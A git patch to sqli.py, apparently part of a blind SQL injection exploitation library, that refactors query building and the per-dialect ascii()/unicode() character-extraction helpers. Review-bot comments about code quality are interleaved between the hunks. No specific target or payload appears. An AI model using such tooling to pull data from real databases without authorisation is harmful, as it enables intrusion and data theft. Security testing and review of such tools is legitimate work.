From 58329993e2aaea7583dcc1f7d328dec3d2a40d85 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder
Date: Mon, 8 Dec 2025 13:28:17 +0100
Subject: [PATCH] SQLi improvement

---
 sqli.py | 31 ++++++++++++-------------------
 1 file changed, 12 insertions(+), 19 deletions(-)

diff --git a/sqli.py b/sqli.py
index e6029ea..1fd670b 100644
--- a/sqli.py
+++ b/sqli.py
@@ -6,12 +6,13 @@ class SQLi(ABC):
     @staticmethod
     def build_query(column: str|list, table=None, condition=None, offset=None, limit=1):
-        column = column if isinstance(column, str) else ",".join(column)
-        condition = "" if not condition else f" WHERE {condition}"
-        offset = "" if offset is None else f" OFFSET {offset}"
-        table = "" if not table else f" FROM {table}"
-        limit = "" if limit is None else f" LIMIT {limit}"
-        return f"SELECT {column}{table}{condition}{limit}{offset}"
+        query = "SELECT "
+        query += column if isinstance(column, str) else ",".join(column)
+        query += "" if not table else f" FROM {table}"
+        query += "" if not condition else f" WHERE {condition}"
+        query += "" if limit is None else f" LIMIT {limit}"
+        query += "" if offset is None or limit is None else f" OFFSET {offset}"
+        return query
 
     def extract_multiple_ints(self, column: str, table=None, condition=None, verbose=False):
         row_count = self.extract_int(f"COUNT({column})", table=table, condition=condition, verbose=verbose)
@@ -38,9 +39,8 @@ class SQLi(ABC):
     def substring(self, what, offset: int, size: int):
         return f"substr({what},{offset},{size})"
 
-    @abstractmethod
-    def ascii(self):
-        pass
+    def ascii(self, what):
+        return f"ascii({what})"
 
     @abstractmethod
     def extract_int(self, column: str, table=None, condition=None,
@@ -210,7 +210,7 @@ class BlindSQLi(SQLi, ABC):
         cur_str = ""
         while True:
             found = False
-            cur_column = self.ascii() + "(" + self.substring(column, len(cur_str) + 1, 1) + ")"
+            cur_column = self.ascii(self.substring(column, len(cur_str) + 1, 1))
             if charset:
                 query = self.build_query(cur_column, table, condition, offset)
             for c in charset:
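Review bot: The last added line of build_query, `query += "" if offset is None or limit is None else f" OFFSET {offset}"`, silently discards a caller-supplied offset whenever limit is None, a change from the removed code that nothing in the hunk documents. A caller passing `offset=` together with `limit=None` gets a query with no OFFSET and no indication that the argument was ignored. I would either reject the combination explicitly, `if offset is not None and limit is None: raise ValueError("offset requires a limit")`, or at least give build_query a docstring stating that OFFSET is emitted only together with LIMIT and why (presumably because some dialects do not accept OFFSET without LIMIT — worth confirming and naming them). As a matter of style, the `query += "" if not table else ...` pattern reads better as a plain guard, `if table: query += f" FROM {table}"`, for each of the optional clauses.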
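Review bot: Turning `ascii` from an `@abstractmethod` into a concrete default in the second hunk means a future dialect subclass that forgets to override it will silently emit `ascii(...)` even where that function does not exist, which the old declaration prevented at instantiation time. If the default is intentional, say so in a docstring, e.g. `"""Wrap *what* in the dialect's character-to-code-point function; defaults to ascii(), override where the dialect names it differently."""`. The new parameter also lacks the annotations its sibling `substring` carries — `def ascii(self, what: str) -> str:` — and the same applies to the SQLitei override in the last hunk of this patch.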
@@ -258,9 +258,6 @@ class PostgreSQLi(SQLi, ABC):
                              f"table_schema='{schema}' AND table_name='{table}'", verbose=verbose)
 
-    def ascii(self):
-        return "ascii"
-
 class MySQLi(SQLi, ABC):
     def get_database_version(self, verbose=False):
         return self.extract_string("VERSION()", verbose=verbose)
@@ -280,10 +277,6 @@ class MySQLi(SQLi, ABC):
                              f"table_schema='{schema}' AND table_name='{table}'", verbose=verbose)
 
-    def ascii(self):
-        return "ascii"
-
-
 class SQLitei(SQLi, ABC):
     def get_database_version(self, verbose=False):
         return self.extract_string("sqlite_version()", verbose=verbose)
@@ -302,5 +295,5 @@ class SQLitei(SQLi, ABC):
         # TODO: we could query the "sql" column and parse it using regex
         raise Exception("Not implemented!")
 
-    def ascii(self):
-        return "unicode"
+    def ascii(self, what):
+        return f"unicode({what})"
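Review bot: The SQLitei override in the final hunk carries no explanation of why it emits `unicode(...)` where the base class emits `ascii(...)`, and the removed one-word version did not either. A single comment above the return would spare the next maintainer a trip to the SQLite docs: `# SQLite has no ascii(); unicode() returns the code point of the first character of its argument`. The override's signature should also match whatever annotation the base `ascii` ends up with so the two stay in sync.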